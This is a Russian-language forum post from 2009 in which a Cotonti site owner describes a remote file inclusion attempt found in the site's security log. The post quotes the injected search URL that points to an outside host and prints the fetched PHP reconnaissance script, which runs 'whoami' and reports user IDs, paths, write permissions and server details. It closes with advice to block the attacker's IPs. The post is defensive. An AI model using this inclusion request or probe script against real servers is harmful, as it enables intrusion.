Security warning

Как нас взламывают

Etiketler: Hacking
Security

Sain	#21567 2009-12-16 01:54
Contributors	Доброго времени суток, уважаемые форумчане. Решил запустить проект на Котонти. Буквально на 3-й день после заливки скриптов на сервер, меня попытались хакнуть. Как все начиналось. Заливая контент, заглянул в системный лог. Нашел там интересное сообщение системы безопасности: A variable type check failed, expecting G/ALP for 'tab' : http://201.134.249.164/intranet/on.txt? - /plug.php?e=search&tab=http://201.134.249.164/intranet/on.txt? Как видим, хакер инклуднуть в форму поиска вот этот скрипт: http://201.134.249.164/intranet/on.txt? Попробовал зайти по этому адресу, но Авира заблокировал доступ. После отключения антивируса скачал файлик. Вот его содержимое: <?php closelog( ); $user = get_current_user( ); $login = posix_getuid( ); $euid = posix_geteuid( ); $ver = phpversion( ); $gid = posix_getgid( ); if ($chdir == "") $chdir = getcwd( ); if(!$whoami)$whoami=exec("whoami"); ?> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0"> <?php $uname = posix_uname( ); while (list($info, $value) = each ($uname)) { ?> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><span style="font-size: 9pt"><b> <?= $info ?> :</b> <?= $value ?></DIV></TD> </TR> <?php } ?> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"> <span style="font-size: 9pt"><b> User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD> </TR> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"> <span style="font-size: 9pt"><b> Current Path:</b> <?= $chdir ?></span></DIV></TD> </TR> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"> <span style="font-size: 9pt"><b> Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?> </span></DIV></TD> </TR> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"> <span style="font-size: 9pt"><b> Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?> </span></DIV></TD> </TR> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"> <span style="font-size: 9pt"><b> Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?> </span></DIV></TD> </TR> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"> <span style="font-size: 9pt"><b> Script Current User:</b> <?= $user ?></span></DIV></TD> </TR> <TR> <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"> <span style="font-size: 9pt"><b> PHP Version:</b> <?= $ver ?></span></DIV></TD> </TR> </TABLE> Инфа о серваке – половина успешного взлома. Так что заблокируйте доступ к серверу со следующих Ip: 201.134.249.164 – адрес, где скрипт для инклуда 204.236.. - подсеть хакера В разработке: 1) Платная подписка для групп (через вебмани) 2) Авторизация с помощью Swekey 3) Авторизация с помощью Yubikey 4) Шифрование авторизации

Sain

#21567 2009-12-16 01:54

Доброго времени суток, уважаемые форумчане. Решил запустить проект на Котонти. Буквально на 3-й день после заливки скриптов на сервер, меня попытались хакнуть.
Как все начиналось. Заливая контент, заглянул в системный лог. Нашел там интересное сообщение системы безопасности:
A variable type check failed, expecting G/ALP for 'tab' : http://201.134.249.164/intranet/on.txt? - /plug.php?e=search&tab=http://201.134.249.164/intranet/on.txt?

Как видим, хакер инклуднуть в форму поиска вот этот скрипт: http://201.134.249.164/intranet/on.txt?
Попробовал зайти по этому адресу, но Авира заблокировал доступ. После отключения антивируса скачал файлик. Вот его содержимое:

<?php
  closelog( );
  $user = get_current_user( );
  $login = posix_getuid( );
  $euid = posix_geteuid( );
  $ver = phpversion( );
  $gid = posix_getgid( );
  if ($chdir == "") $chdir = getcwd( );
  if(!$whoami)$whoami=exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">

<?php
  $uname = posix_uname( );
  while (list($info, $value) = each ($uname)) {
?>
  <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><span style="font-size: 9pt"><b>
		<?= $info ?>
      :</b> <?= $value ?></DIV></TD>
  </TR>
<?php
  }
?>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">

	<span style="font-size: 9pt"><b>
    User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD>
  </TR>
  <TR>

  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Current Path:</b> <?= $chdir ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>

    </span></DIV></TD>
  </TR>  
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
    </span></DIV></TD>
  </TR>

  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
    </span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">

	<span style="font-size: 9pt"><b>
    Script Current User:</b> <?= $user ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    PHP Version:</b> <?= $ver ?></span></DIV></TD>

  </TR>
</TABLE>

Инфа о серваке – половина успешного взлома. Так что заблокируйте доступ к серверу со следующих Ip:
201.134.249.164 – адрес, где скрипт для инклуда
204.236.*.* - подсеть хакера

В разработке:
1) Платная подписка для групп (через вебмани)
2) Авторизация с помощью Swekey
3) Авторизация с помощью Yubikey
4) Шифрование авторизации